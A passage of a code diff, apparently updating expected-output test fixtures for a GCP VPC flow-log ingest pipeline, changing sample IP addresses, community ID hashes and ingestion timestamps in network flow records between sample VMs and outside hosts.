"{\"insertId\":\"14iipwlfd8t01o\",\"jsonPayload\":{\"bytes_sent\":\"361966\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"80\",\"reporter\":\"SRC\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392542600Z", + "original": "{\"insertId\":\"14iipwlfd8t01o\",\"jsonPayload\":{\"bytes_sent\":\"361966\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"80\",\"reporter\":\"SRC\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466868771Z", "end": "2019-06-14T03:49:37.933154111Z", @@ -24550,17 +24550,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 51950, "bytes": 1457, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:pHA6HHmyea3zNeMwTBqwG+WoGI0=", + "community_id": "1:jcjE3OEEgs/JCmhTXaJJ97LHMMA=", "bytes": 1457, "transport": "tcp", "type": "ipv4", @@ -24574,7 +24574,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, @@ -24599,8 +24599,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869301600Z", - "original": "{\"insertId\":\"14iipwlfd8t01p\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":51950},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392546400Z", + "original": "{\"insertId\":\"14iipwlfd8t01p\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51950},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:41:50.645030007Z", "end": "2019-06-14T03:41:50.757658840Z", @@ -24621,9 +24621,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58658, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -24637,7 +24637,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:O0CO0+ucLIQiJqFN7AsbDZv6vyc=", + "community_id": "1:dsMvRAsck5r3/JXfFORCHfiL8IQ=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -24652,7 +24652,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { @@ -24676,8 +24676,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869304200Z", - "original": "{\"insertId\":\"14iipwlfd8t01e\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":58658,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392550800Z", + "original": "{\"insertId\":\"14iipwlfd8t01e\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58658,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:49:50.733935895Z", "end": "2019-06-14T03:49:50.856250208Z", @@ -24704,17 +24704,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 59924, "bytes": 1467, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:T0Rv8TiMkVLDs+lIQf8LeL2yG4A=", + "community_id": "1:6chxyTuZx655lb71dq3THmRLfyY=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -24728,7 +24728,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, @@ -24753,8 +24753,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869306900Z", - "original": "{\"insertId\":\"14iipwlfd8t01q\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":59924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392556300Z", + "original": "{\"insertId\":\"14iipwlfd8t01q\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":59924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:41:08.092659117Z", "end": "2019-06-14T03:41:08.213471928Z", @@ -24781,17 +24781,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58658, "bytes": 1461, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:O0CO0+ucLIQiJqFN7AsbDZv6vyc=", + "community_id": "1:dsMvRAsck5r3/JXfFORCHfiL8IQ=", "bytes": 1461, "transport": "tcp", "type": "ipv4", @@ -24805,7 +24805,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, @@ -24830,8 +24830,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869309600Z", - "original": "{\"insertId\":\"14iipwlfd8t01i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":58658},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392560400Z", + "original": "{\"insertId\":\"14iipwlfd8t01i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58658},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:49:50.733935895Z", "end": "2019-06-14T03:49:50.856250208Z", @@ -24854,9 +24854,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65272, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -24870,7 +24870,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Oo7JpkYAgptDkVqBTaGUMnHqiYQ=", + "community_id": "1:AkP1aSEJH9bFKIOkOHf1rOVHNwk=", "bytes": 123732, "transport": "tcp", "type": "ipv4", @@ -24885,7 +24885,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -24909,8 +24909,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869312200Z", - "original": "{\"insertId\":\"14iipwlfd8t01k\",\"jsonPayload\":{\"bytes_sent\":\"123732\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65272,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"618\",\"reporter\":\"SRC\",\"rtt_msec\":\"123\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392564500Z", + "original": "{\"insertId\":\"14iipwlfd8t01k\",\"jsonPayload\":{\"bytes_sent\":\"123732\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65272,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"618\",\"reporter\":\"SRC\",\"rtt_msec\":\"123\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.403442252Z", "end": "2019-06-14T03:49:56.316981133Z", @@ -24939,17 +24939,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65273, "bytes": 76342, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 710 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:12d2Qz5iuI+gHCcFYKHiK+jTFKY=", + "community_id": "1:f+7WLGF1FDb2ZMudfLtDGfB3+gQ=", "bytes": 76342, "transport": "tcp", "type": "ipv4", @@ -24963,7 +24963,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -24988,8 +24988,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869314800Z", - "original": "{\"insertId\":\"14iipwlfd8t01f\",\"jsonPayload\":{\"bytes_sent\":\"76342\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65273},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"115\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392567800Z", + "original": "{\"insertId\":\"14iipwlfd8t01f\",\"jsonPayload\":{\"bytes_sent\":\"76342\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65273},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"115\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.155378287Z", "end": "2019-06-14T03:49:56.316930467Z", @@ -25012,9 +25012,9 @@ "as": { "number": 4847 }, - "address": "192.0.2.73", + "address": "192.168.2.73", "port": 45224, - "ip": "192.0.2.73" + "ip": "192.168.2.73" }, "source": { "address": "10.73.186.17", @@ -25028,7 +25028,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:rKlCjiIPAcL1SMVo+HVqssXpCbA=", + "community_id": "1:ppuocaYwNMzpWOs4nDw/orHgE7E=", "bytes": 9761, "transport": "tcp", "type": "ipv4", @@ -25043,7 +25043,7 @@ "related": { "ip": [ "10.73.186.17", - "192.0.2.73" + "192.168.2.73" ] }, "gcp": { @@ -25067,8 +25067,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869317400Z", - "original": "{\"insertId\":\"14iipwlfd8t018\",\"jsonPayload\":{\"bytes_sent\":\"9761\",\"connection\":{\"dest_ip\":\"192.0.2.73\",\"dest_port\":45224,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"end_time\":\"2019-06-14T03:44:23.955039461Z\",\"packets_sent\":\"13\",\"reporter\":\"SRC\",\"rtt_msec\":\"242\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392572200Z", + "original": "{\"insertId\":\"14iipwlfd8t018\",\"jsonPayload\":{\"bytes_sent\":\"9761\",\"connection\":{\"dest_ip\":\"192.168.2.73\",\"dest_port\":45224,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"end_time\":\"2019-06-14T03:44:23.955039461Z\",\"packets_sent\":\"13\",\"reporter\":\"SRC\",\"rtt_msec\":\"242\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:42:23.705320616Z", "end": "2019-06-14T03:44:23.955039461Z", @@ -25095,17 +25095,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 56410, "bytes": 1467, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:0c52Gpv2d5YT01CRixtDXpBMSJQ=", + "community_id": "1:4Pc6C8KshAP3IEqmZaW0jzA00wQ=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -25119,7 +25119,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -25144,8 +25144,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869320Z", - "original": "{\"insertId\":\"14iipwlfd8t01a\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":56410},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"37\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392577900Z", + "original": "{\"insertId\":\"14iipwlfd8t01a\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":56410},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"37\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": 